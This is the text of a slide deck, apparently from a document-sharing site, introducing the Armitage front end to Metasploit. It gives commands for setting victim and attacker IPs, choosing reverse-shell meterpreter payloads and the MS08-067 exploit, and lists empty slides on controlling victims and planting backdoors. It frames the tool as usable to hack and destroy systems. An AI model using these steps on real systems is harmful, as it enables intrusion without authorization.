Armitage : Art of Exploitation
-
Upload
kapil-soni -
Category
Internet
-
view
315 -
download
3
description
Transcript of Armitage : Art of Exploitation
ARMITAGE
Art Of Exploitation
www.kapilsoni.in
By – Kapil Soni (2009)
www.kapilsoni.in
Armitage :-
Armitage is GUI (Graphical User Interface) Tools For Metasploit That can be used for
Penetration Testing of System and Network. It is a Main Or Easily Accessible Tool Of Metasploit
Framework. Also we can use it For Backdoor, Remote Access,
Trojan Creation, Hack System or Network, Destroy Systems or Networks or Much More.
In Armitage We Need Four Important Modules- RHOST (Victim’s IP Address) LHOST (Attacker’s IP Address) Payload Exploit
www.kapilsoni.in
Important Modules Of Armitage :-
RHOST :- RHOST Stands for REMOTE HOST Means Victim. If We Want Hack or Remote Access of Victim’s Computer so We Necessary Need IP Address Of Victim’s Computer. Without IP Address Of Victim’s Computer We Can not hack or Take Remote Access of Computer.
Setting RHOST By Command –>> SET RHOST 192.168.1.1 (Victim’s IP
Address)
LHOST :- LHOST Stands for LOCAL HOST Means Attacker. Many Exploits Demands of LHOST for Attacking Purpose or Remotely Access Purpose.
Setting LHOST By Command –>> SET LHOST 192.168.1.2 (Attacker’s IP
Address)
www.kapilsoni.in
Important Modules Of Armitage :-
PAYLOAD :- Payload is a way to communicate Victim’s computer. Payload Provides a Platform or a Medium to Communicate with Victim’s Computer.
There are many types of Payload According to Work or Uses. The Most Usable or Workable Payload is METERPRETER. Payload Gives You Options To Access Victim’s Computer.
Setting Payloads With the Help Of Command – >> set payload
windows/meterpreter/reverse_tcp>> set payload windows/vncinject/reverse_tcp>> set payload windows/shell/reverse_tcp
There are Above 250 Payloads are Available In Armitage.
www.kapilsoni.in
Important Modules Of Armitage :-
EXPLOITS :- Before Attack, You Must Choose Your Weapon. Armitage Make This Process Easy. For Example We Want to Hack Windows XP/2003, In Windows XP/2003 There are Many Types Of Vulnerability (Loophole), The Most Famous Or Attackable Vulnerability is MS_08_067.
Now If We Want To Remote Access Of Victim’s Computer So We Can Enter On Victim’s PC With The Help Of Exploit. There Are Many Types Of Exploits Available According To Vulnerability Or Working. Setting Exploit With The Help Of Command –
>> use windows/smb/ms08_067_netapi
www.kapilsoni.in
Graphical User Interface (GUI) Of Armitage :-
www.kapilsoni.in
Scanning Remote Host(Victim) In Armitage :-
www.kapilsoni.in
Finding Attacks For Victim PC In Armitage :-
www.kapilsoni.in
Triggering Vulnerability In Armitage :-
www.kapilsoni.in
After Attacking In Vulnerability :-
www.kapilsoni.in
Controlling Victim PC Through METERPRETER :-
www.kapilsoni.in
Browsing Files Victim PC Through METERPRETER :-
www.kapilsoni.in
Backdoor Through Armitage :-
www.kapilsoni.in
Backdoor Through Armitage :-
www.kapilsoni.in
Backdoor Through Armitage :-
www.kapilsoni.in
Backdoor Through Armitage :-
www.kapilsoni.in
Backdoor Through Armitage :-
www.kapilsoni.in
Backdoor Through Armitage :-
www.kapilsoni.in
Thank Y
THANK YOU